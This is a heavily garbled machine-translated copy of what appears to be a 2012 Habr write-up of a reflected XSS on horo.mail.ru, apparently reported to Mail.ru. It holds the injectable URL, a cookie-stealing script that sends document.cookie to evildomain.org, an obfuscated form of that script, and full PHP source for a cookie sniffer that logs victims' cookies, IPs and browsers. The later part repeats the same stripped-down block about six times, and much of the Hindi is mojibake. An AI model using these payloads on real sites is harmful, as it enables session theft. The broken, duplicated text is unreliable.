Geekly Articles each Day

Mail.ru рдФрд░ рддреИрдпрд╛рд░ рдХрд╛рд░рдирд╛рдореЗ рдкрд░ рдирд┐рд╖реНрдХреНрд░рд┐рдп XSS

рдХрд░рдиреЗ рдХреЛ рдХреБрдЫ рдирд╣реАрдВ рдерд╛, рд╢рд╛рдо рд╣реЛ рдЪреБрдХреА рдереАред

рдПрдХ рджрд┐рди рдореИрдВ рдШрд░ рдкрд░ рдмреИрдард╛ рдерд╛, рдПрдХ рд╕рд╛рдзрд╛рд░рдг, рдирд┐рд╣рддреНрдерд╛, рд╡рд╛рдпрд▓рд┐рди-рд╕реНрдХреНрд░рд┐рдкреНрдЯреЗрдб рдШрд░ рдкрд░, рдореЗрд░реА рдардВрдб рдХреЗ рдкреАрдЫреЗ, рд▓реЗрдХрд┐рди рдХреЛрдИ рдХрдо рдЖрд░рд╛рдорджрд╛рдпрдХ рдкреАрд╕реА рдирд╣реАрдВ рдерд╛ред рд╣рд╛рд▓ рд╣реА рдореЗрдВ, рдЙрдиреНрд╣реЛрдВрдиреЗ рдордВрдЪреЛрдВ рдФрд░ рд╡реЗрдмрд╕рд╛рдЗрдЯреЛрдВ рдкрд░ рд╡рд┐рднрд┐рдиреНрди рд░реВрдкреЛрдВ рдореЗрдВ рд╡рд┐рднрд┐рдиреНрди рдЪрд░рд┐рддреНрд░ рд╕реЗрдЯреЛрдВ рдХреЛ рдПрдХ рд╣реА рдЙрджреНрджреЗрд╢реНрдп рдХреЗ рд▓рд┐рдП рдПрдХ рддрд░рд╣ рд╕реЗ рдпрд╛ рдХрд┐рд╕реА рдЕрдиреНрдп рдЙрджреНрджреЗрд╢реНрдп рд╕реЗ рднрд░рд╛ рдЬрд╛рдирд╛ рдкрд╕рдВрдж рдХрд┐рдпрд╛: рдЗрдирдкреБрдЯ рдлрд╝реАрд▓реНрдб рдХреЗ HTML рдмреНрд▓реЙрдХ рдХреЛ рдирд╖реНрдЯ рдХрд░рдирд╛ред рд╡рд╣ рдПрдХ рдЕрдЬреАрдм рд╣реИ, рдЙрд╕реЗ рд▓реЛрдЧреЛрдВ рдХреА рдорджрдж рдХрд░рдиреЗ рдореЗрдВ рдордЬрд╝рд╛ рдЖрдпрд╛ред рд╕рдВрд╕рд╛рдзрди рдкреНрд░рд╢рд╛рд╕рдХ рдХреЛ рд╕реВрдЪрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛ рд░рд╣рд╛ рд╣реИ, рдЙрд╕рдХреА рдорджрдж рдХреЗ рдмрд┐рдирд╛ рдпрд╛ рдЙрд╕рдХреЗ рджреНрд╡рд╛рд░рд╛ рдкрд╛рдП рдЧрдП рднреЗрджреНрдпрддрд╛ рдХреЛ рд╕рдорд╛рдкреНрдд рдХрд┐рдП рдмрд┐рдирд╛, рдРрд╕рд╛ рдкреНрд░рддреНрдпреЗрдХ рдорд╛рдорд▓рд╛ рдЙрд╕рдХреЗ рд▓рд┐рдП рдПрдХ рдорд╣рд╛рдХрд╛рд╡реНрдп рдЬреАрдд рдерд╛ред

рд▓реЗрдХрд┐рди рдпрд╣ рд╢рд╛рдо рдЕрд╕рд╛рдорд╛рдиреНрдп рдереА, рдХреНрдпреЛрдВрдХрд┐ рд╡рд╣ рдЕрдЧрд▓реЗ рдордВрдЪ, рдпрд╛ рдПрдХ рдирд┐рдЬреА рд╕рд╛рдЗрдЯ рдкрд░ рдирд╣реАрдВ рдЧрдИ рдереА, рдЙрд╕рдиреЗ mail.ru рдЦреЛрд▓рд╛ рдФрд░ рд╕реЛрдЪрд╛, рдХреНрдпреЛрдВ рдирд╣реАрдВ?

рд╢реБрд░реБрдЖрдд ...

рдкреАрдбрд╝рд┐рдд рдХреА рдкрд╣рдЪрд╛рди рдХреЗ рд▓рд┐рдП рдкрд╣рд▓рд╛ рдХрджрдо рдерд╛


рдкреАрдбрд╝рд┐рдд рдХреЗ рд▓рд┐рдП, "рд▓реЗрдбреА" рдФрд░ "рд░рд╛рд╢рд┐рдлрд▓" рдЪреБрдиреЗ рдЧрдПред рдЪрдпрди рд╕рд┐рджреНрдзрд╛рдВрдд рдерд╛ "рдХреМрди рд╕рд╛ рдкреНрд░реЛрдЬреЗрдХреНрдЯ рдЗрд╕рдХреЗ рд▓рд┐рдП рдХрдо рджрд┐рд▓рдЪрд╕реНрдк рд╣реИ?"

рдХреБрдЫ рд╣реА рд╕рдордп рдореЗрдВ "рд▓реЗрдбреА" рдХреЛ "рд╣реЙрд╕реНрдХреЛрд╕реНрдХреЛрдк" рдкрд░ рд╕реЗрдЯ рдХрд┐рдпрд╛ рдЧрдпрд╛ред рддрдм рдореБрдЭреЗ рд╕рднреА рдЕрд╡рд╕рд░реЛрдВ рдХреЗ рд▓рд┐рдП рдХреБрдВрдбрд▓реА рдХреЗ рд╕рд╛рде рдмреНрд▓реЙрдХ рдореЗрдВ рджрд┐рд▓рдЪрд╕реНрдкреА рдереА, рдЬреЛ рдкреГрд╖реНрда рддрд╛рдЬрд╝рд╛ рд╣реЛрдиреЗ рдкрд░ рдмрджрд▓ рдЧрдпрд╛ред



рд╕рд╛рджреЗ "> рдЯреЗрд╕реНрдЯ рдбрд╛рд▓рдиреЗ рдХреЗ рдмрд╛рдж , рд╣рдо рджреЗрдЦрддреЗ рд╣реИрдВ:


рд╢реБрд░реБрдЖрдд рдХреЗ рд▓рд┐рдП, рдмреБрд░рд╛ рдирд╣реАрдВ рд╣реИред рдЕрдм рд╣рдо рдЙрд╕ рдлреЙрд░реНрдо рдбреЗрдЯрд╛ рдХреЛ рджреЗрдЦрддреЗ рд╣реИрдВ, рдЬрд┐рд╕рдореЗрдВ рд╣рдо рдЕрдкрдирд╛ рдЬреНрд▓реЛрдбрдХреЛрдб рднреЗрдЬреЗрдВрдЧреЗред рдкреГрд╖реНрда рд╕реНрд░реЛрдд рдЦреЛрд▓реЗрдВ рдФрд░ рдЕрд╕реБрд░рдХреНрд╖рд┐рдд рдбреЗрдЯрд╛ рдЖрдЙрдЯрдкреБрдЯ рдлрд╝реАрд▓реНрдб рдХреЗ рдХреЛрдб рдХреЛ рджреЗрдЦреЗрдВ:


рдЗрдирдкреБрдЯ рдлреЙрд░реНрдо рдХреЛрдб:


рдФрд░ рдЗрдирдкреБрдЯ рдлрд╝реАрд▓реНрдб рдХреЛрдб:


рд╣рдореЗрдВ рдпрд╣рд╛рдБ рдЬреЛ рдорд┐рд▓рддрд╛ рд╣реИ, рд╡рд╣ рдРрд╕реА рдХрдбрд╝реА рд╣реИ:
http:\\horo.mail.ru/personal.html?type=prg&so_nm= XSS

рдкреЗрди рдкрд░реАрдХреНрд╖рдг

рдЕрдЧрд▓рд╛ рдЪрд░рдг рдкрд╛рддреНрд░реЛрдВ рдХреЛ рдЫрд╛рдирдиреЗ рдХреЗ рд▓рд┐рдП рдХреНрд╖реЗрддреНрд░ рдХреА рдЬрд╛рдВрдЪ рдХрд░рдирд╛ рд╣реИред

рд▓рд┐рдВрдХ рдХрд╛ рдкрд╛рд▓рди рдХрд░реЗрдВ:
http:\\horo.mail.ru/personal.html?type=prg&so_nm= рдкрд╛рда "> http:\\horo.mail.ru/personal.html?type=prg&so_nm= <a рдФрд░ рд╣рдо рджреЗрдЦрддреЗ рд╣реИрдВ рдХрд┐ рдмрд┐рдВрджреБ рдлрд╝рд┐рд▓реНрдЯрд░ рдХрд┐рдпрд╛ рдЬрд╛ рд░рд╣рд╛ рд╣реИ


<a рдЯреВрдЯреЗ рд╣реБрдП рдЯреИрдЧ рдХреЗ рдЕрд╡рд╢реЗрд╖ рд╕реЗ, рдПрдХ рдЫреЛрдЯреЗ рдХрдЪрд░рд╛ рдХрдЯрд░ рдХреЗ рд░реВрдк <a рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИред рдЕрдиреНрдпрдерд╛, рдкрд┐рдЫрд▓реЗ рдЯреИрдЧ рдХреЛ рдмрдВрдж рдХрд░рдиреЗ рд╡рд╛рд▓реЗ рдорд▓рдмреЗ рд╣реЛрдВрдЧреЗ, рдЬреИрд╕реЗ:


рд╣рдордиреЗ рдирд┐рд░реНрдзрд╛рд░рд┐рдд рдХрд┐рдпрд╛ рдХрд┐ рдлрд╝реАрд▓реНрдб рдмрд┐рдВрджреБ рдХреЛ рдлрд╝рд┐рд▓реНрдЯрд░ рдХрд░рддреА рд╣реИ, рдЕрд░реНрдерд╛рддред
 "><script>alert();<script>


рдпрд╣ рдХрд╛рдо рдХрд░реЗрдЧрд╛, рд▓реЗрдХрд┐рди
рдирд╣реАрдВ, рдХреНрдпреЛрдВрдХрд┐ рд╣рдореЗрдВ рдЬреЛ рдЖрдЙрдЯрдкреБрдЯ рдорд┐рд▓рддрд╛ рд╣реИ


рдЕрд╕реНрдкрд╖реНрдЯрдХрд░реНрддрд╛

рд╣рдореЗрдВ рдкреГрд╖реНрда рдкрд░ рдПрдХ рдХреЛрдб рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реИ рдЬреЛ рдХреБрдХреАрдЬрд╝ рдХреЛ рд╕реНрдирд┐рдлрд░ рддрдХ рдкрд╣реБрдВрдЪрд╛рдПрдЧрд╛, рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП:
 img=new Image(); img.src='http://evildomain.org/g/sniff.php?cookie='+document.cookie;


рдХреЛрдб рдХреЗ рдПрдХ рдмрд┐рдВрджреБ рдХреЛ рдлрд╝рд┐рд▓реНрдЯрд░ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП, рдЗрд╕реЗ рдмрд╛рдзрд┐рдд рдХрд░рдирд╛ рдЖрд╡рд╢реНрдпрдХ рд╣реИ; рдЗрд╕рдХреЗ рд▓рд┐рдП, рд╕реНрдХреНрд░рд┐рдкреНрдЯ рд╡рд┐рднрд┐рдиреНрди рд╕рдВрд╕рд╛рдзрдиреЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВ, рдЗрд╕ рд╡рд┐рд╢реЗрд╖ рд░реВрдк рд╕реЗ, www.javascriptobfuscator.com/default.aspx рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЧрдпрд╛ рдерд╛ред

рд╣рдо рдЙрд╕реЗ рдЗрдирдкреБрдЯ рдкрд░ рд╕рд╛рдорд╛рдиреНрдп JS рджреЗрддреЗ рд╣реИрдВ:
 img=new Image(); img.src='http://evildomain.org/g/sniff.php?cookie='+document.cookie;


рдЖрдЙрдЯрдкреБрдЯ рдкрд░, рд╣рдореЗрдВ рдмрд┐рдирд╛ рдЕрдВрдХ рдХреЗ рдПрдХ рдмреБрд░реА JS рдорд┐рд▓ рдЬрд╛рддреА рд╣реИ:
var _0xdfd0=["\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x65\x76\x69\x6C\x64\x6F\x6D\x61\x69\x6E\x2E\x6F\x72\x67\x2F\x67\x2F\x73\x6E\x69\x66\x66\x2E\x70\x68\x70\x3F\x63\x6F\x6F\x6B\x69\x65\x3D","\x63\x6F\x6F\x6B\x69\x65"];img= new Image();img[_0xdfd0[0]]=_0xdfd0[1]+document[_0xdfd0[2]];

рд╣рдо XSS, :
http:\\horo.mail.ru/personal.html?type=prg&so_nm= "><a

http://evildomain.org/g/sniff.php , , :
<?php if (isset($_GET['cookie'])) { $text = "New cookie accept from ". $_SERVER['REMOTE_ADDR'] ." at ". date('l jS \of FY h:i:s A'); $text .= "\n".str_repeat("=", 22) . "\n" . $_GET['cookie']."\n".str_repeat("=", 22)."\n"; $file = fopen("./sniff.txt", "a"); fwrite($file, $text); fclose($file); } $date=date("[D|d/m/Y|H:i]"); $ip=getenv("Remote_addr"); $real_ip=getenv("HTTP_X_FORWARDED_FOR"); $otkuda=getenv("HTTP_REFERER"); $browser=getenv("HTTP_USER_AGENT"); $win=getenv("windir"); $uid=implode($argv," "); $fp=fopen("./log.txt","a"); fputs($fp,"$date\t|$uid|\t$ip($real_ip)\t$browser\t$otkuda\t$win\n"); fclose($fp); ?>

.


IE :). , Chrome, XSS.

html , , mail.ru ( FF Opera) :


, , mail.ru, .

mail.ru
29.06.2012: Ticket#2012062921010318
:

.

.
.

.

, .

Mail.ru

, mail.ru . рдлреНрд░реЗрдо XSS, :
http:\\horo.mail.ru/personal.html?type=prg&so_nm= "><a

http://evildomain.org/g/sniff.php , , :
<?php if (isset($_GET['cookie'])) { $text = "New cookie accept from ". $_SERVER['REMOTE_ADDR'] ." at ". date('l jS \of FY h:i:s A'); $text .= "\n".str_repeat("=", 22) . "\n" . $_GET['cookie']."\n".str_repeat("=", 22)."\n"; $file = fopen("./sniff.txt", "a"); fwrite($file, $text); fclose($file); } $date=date("[D|d/m/Y|H:i]"); $ip=getenv("Remote_addr"); $real_ip=getenv("HTTP_X_FORWARDED_FOR"); $otkuda=getenv("HTTP_REFERER"); $browser=getenv("HTTP_USER_AGENT"); $win=getenv("windir"); $uid=implode($argv," "); $fp=fopen("./log.txt","a"); fputs($fp,"$date\t|$uid|\t$ip($real_ip)\t$browser\t$otkuda\t$win\n"); fclose($fp); ?>

.


IE :). , Chrome, XSS.

html , , mail.ru ( FF Opera) :


, , mail.ru, .

mail.ru
29.06.2012: Ticket#2012062921010318
:

.

.
.

.

, .

Mail.ru

, mail.ru . XSS, :
http:\\horo.mail.ru/personal.html?type=prg&so_nm= "><a

http://evildomain.org/g/sniff.php , , :
<?php if (isset($_GET['cookie'])) { $text = "New cookie accept from ". $_SERVER['REMOTE_ADDR'] ." at ". date('l jS \of FY h:i:s A'); $text .= "\n".str_repeat("=", 22) . "\n" . $_GET['cookie']."\n".str_repeat("=", 22)."\n"; $file = fopen("./sniff.txt", "a"); fwrite($file, $text); fclose($file); } $date=date("[D|d/m/Y|H:i]"); $ip=getenv("Remote_addr"); $real_ip=getenv("HTTP_X_FORWARDED_FOR"); $otkuda=getenv("HTTP_REFERER"); $browser=getenv("HTTP_USER_AGENT"); $win=getenv("windir"); $uid=implode($argv," "); $fp=fopen("./log.txt","a"); fputs($fp,"$date\t|$uid|\t$ip($real_ip)\t$browser\t$otkuda\t$win\n"); fclose($fp); ?>

.


IE :). , Chrome, XSS.

html , , mail.ru ( FF Opera) :


, , mail.ru, .

mail.ru
29.06.2012: Ticket#2012062921010318
:

.

.
.

.

, .

Mail.ru

, mail.ru .
     XSS,   : 
 http:\\horo.mail.ru/personal.html?type=prg&so_nm= "><a 
 
     http://evildomain.org/g/sniff.php  ,      ,    : 
 <?php if (isset($_GET['cookie'])) { $text = "New cookie accept from ". $_SERVER['REMOTE_ADDR'] ." at ". date('l jS \of FY h:i:s A'); $text .= "\n".str_repeat("=", 22) . "\n" . $_GET['cookie']."\n".str_repeat("=", 22)."\n"; $file = fopen("./sniff.txt", "a"); fwrite($file, $text); fclose($file); } $date=date("[D|d/m/Y|H:i]"); $ip=getenv("Remote_addr"); $real_ip=getenv("HTTP_X_FORWARDED_FOR"); $otkuda=getenv("HTTP_REFERER"); $browser=getenv("HTTP_USER_AGENT"); $win=getenv("windir"); $uid=implode($argv," "); $fp=fopen("./log.txt","a"); fputs($fp,"$date\t|$uid|\t$ip($real_ip)\t$browser\t$otkuda\t$win\n"); fclose($fp); ?> 
 
  . 
 
  
          IE     :). ,   Chrome,  XSS. 
 
         html    ,       ,       mail.ru ( FF  Opera)   : 
  
 
     ,    ,       mail.ru,    . 
 
  mail.ru   
       29.06.2012: Ticket#2012062921010318 
   : 
 
 . 
 
     . 
    . 
 
   . 
 
  ,  . 
    
   Mail.ru 
 
       ,    mail.ru    .
XSS, :
http:\\horo.mail.ru/personal.html?type=prg&so_nm= "><a

http://evildomain.org/g/sniff.php , , :
<?php if (isset($_GET['cookie'])) { $text = "New cookie accept from ". $_SERVER['REMOTE_ADDR'] ." at ". date('l jS \of FY h:i:s A'); $text .= "\n".str_repeat("=", 22) . "\n" . $_GET['cookie']."\n".str_repeat("=", 22)."\n"; $file = fopen("./sniff.txt", "a"); fwrite($file, $text); fclose($file); } $date=date("[D|d/m/Y|H:i]"); $ip=getenv("Remote_addr"); $real_ip=getenv("HTTP_X_FORWARDED_FOR"); $otkuda=getenv("HTTP_REFERER"); $browser=getenv("HTTP_USER_AGENT"); $win=getenv("windir"); $uid=implode($argv," "); $fp=fopen("./log.txt","a"); fputs($fp,"$date\t|$uid|\t$ip($real_ip)\t$browser\t$otkuda\t$win\n"); fclose($fp); ?>

.


IE :). , Chrome, XSS.

html , , mail.ru ( FF Opera) :


, , mail.ru, .

mail.ru
29.06.2012: Ticket#2012062921010318
:

.

.
.

.

, .

Mail.ru

, mail.ru .
XSS, :
http:\\horo.mail.ru/personal.html?type=prg&so_nm= "><a

http://evildomain.org/g/sniff.php , , :
<?php if (isset($_GET['cookie'])) { $text = "New cookie accept from ". $_SERVER['REMOTE_ADDR'] ." at ". date('l jS \of FY h:i:s A'); $text .= "\n".str_repeat("=", 22) . "\n" . $_GET['cookie']."\n".str_repeat("=", 22)."\n"; $file = fopen("./sniff.txt", "a"); fwrite($file, $text); fclose($file); } $date=date("[D|d/m/Y|H:i]"); $ip=getenv("Remote_addr"); $real_ip=getenv("HTTP_X_FORWARDED_FOR"); $otkuda=getenv("HTTP_REFERER"); $browser=getenv("HTTP_USER_AGENT"); $win=getenv("windir"); $uid=implode($argv," "); $fp=fopen("./log.txt","a"); fputs($fp,"$date\t|$uid|\t$ip($real_ip)\t$browser\t$otkuda\t$win\n"); fclose($fp); ?>

.


IE :). , Chrome, XSS.

html , , mail.ru ( FF Opera) :


, , mail.ru, .

mail.ru
29.06.2012: Ticket#2012062921010318
:

.

.
.

.

, .

Mail.ru

, mail.ru .
XSS, :
http:\\horo.mail.ru/personal.html?type=prg&so_nm= "><a

http://evildomain.org/g/sniff.php , , :
<?php if (isset($_GET['cookie'])) { $text = "New cookie accept from ". $_SERVER['REMOTE_ADDR'] ." at ". date('l jS \of FY h:i:s A'); $text .= "\n".str_repeat("=", 22) . "\n" . $_GET['cookie']."\n".str_repeat("=", 22)."\n"; $file = fopen("./sniff.txt", "a"); fwrite($file, $text); fclose($file); } $date=date("[D|d/m/Y|H:i]"); $ip=getenv("Remote_addr"); $real_ip=getenv("HTTP_X_FORWARDED_FOR"); $otkuda=getenv("HTTP_REFERER"); $browser=getenv("HTTP_USER_AGENT"); $win=getenv("windir"); $uid=implode($argv," "); $fp=fopen("./log.txt","a"); fputs($fp,"$date\t|$uid|\t$ip($real_ip)\t$browser\t$otkuda\t$win\n"); fclose($fp); ?>

.


IE :). , Chrome, XSS.

html , , mail.ru ( FF Opera) :


, , mail.ru, .

mail.ru
29.06.2012: Ticket#2012062921010318
:

.

.
.

.

, .

Mail.ru

, mail.ru .
XSS, :
http:\\horo.mail.ru/personal.html?type=prg&so_nm= "><a

http://evildomain.org/g/sniff.php , , :
<?php if (isset($_GET['cookie'])) { $text = "New cookie accept from ". $_SERVER['REMOTE_ADDR'] ." at ". date('l jS \of FY h:i:s A'); $text .= "\n".str_repeat("=", 22) . "\n" . $_GET['cookie']."\n".str_repeat("=", 22)."\n"; $file = fopen("./sniff.txt", "a"); fwrite($file, $text); fclose($file); } $date=date("[D|d/m/Y|H:i]"); $ip=getenv("Remote_addr"); $real_ip=getenv("HTTP_X_FORWARDED_FOR"); $otkuda=getenv("HTTP_REFERER"); $browser=getenv("HTTP_USER_AGENT"); $win=getenv("windir"); $uid=implode($argv," "); $fp=fopen("./log.txt","a"); fputs($fp,"$date\t|$uid|\t$ip($real_ip)\t$browser\t$otkuda\t$win\n"); fclose($fp); ?>

.


IE :). , Chrome, XSS.

html , , mail.ru ( FF Opera) :


, , mail.ru, .

mail.ru
29.06.2012: Ticket#2012062921010318
:

.

.
.

.

, .

Mail.ru

, mail.ru .
XSS, :
http:\\horo.mail.ru/personal.html?type=prg&so_nm= "><a

http://evildomain.org/g/sniff.php , , :
<?php if (isset($_GET['cookie'])) { $text = "New cookie accept from ". $_SERVER['REMOTE_ADDR'] ." at ". date('l jS \of FY h:i:s A'); $text .= "\n".str_repeat("=", 22) . "\n" . $_GET['cookie']."\n".str_repeat("=", 22)."\n"; $file = fopen("./sniff.txt", "a"); fwrite($file, $text); fclose($file); } $date=date("[D|d/m/Y|H:i]"); $ip=getenv("Remote_addr"); $real_ip=getenv("HTTP_X_FORWARDED_FOR"); $otkuda=getenv("HTTP_REFERER"); $browser=getenv("HTTP_USER_AGENT"); $win=getenv("windir"); $uid=implode($argv," "); $fp=fopen("./log.txt","a"); fputs($fp,"$date\t|$uid|\t$ip($real_ip)\t$browser\t$otkuda\t$win\n"); fclose($fp); ?>

.


IE :). , Chrome, XSS.

html , , mail.ru ( FF Opera) :


, , mail.ru, .

mail.ru
29.06.2012: Ticket#2012062921010318
:

.

.
.

.

, .

Mail.ru

, mail.ru .

Source: https://habr.com/ru/post/In149134/

More articles:


All Articles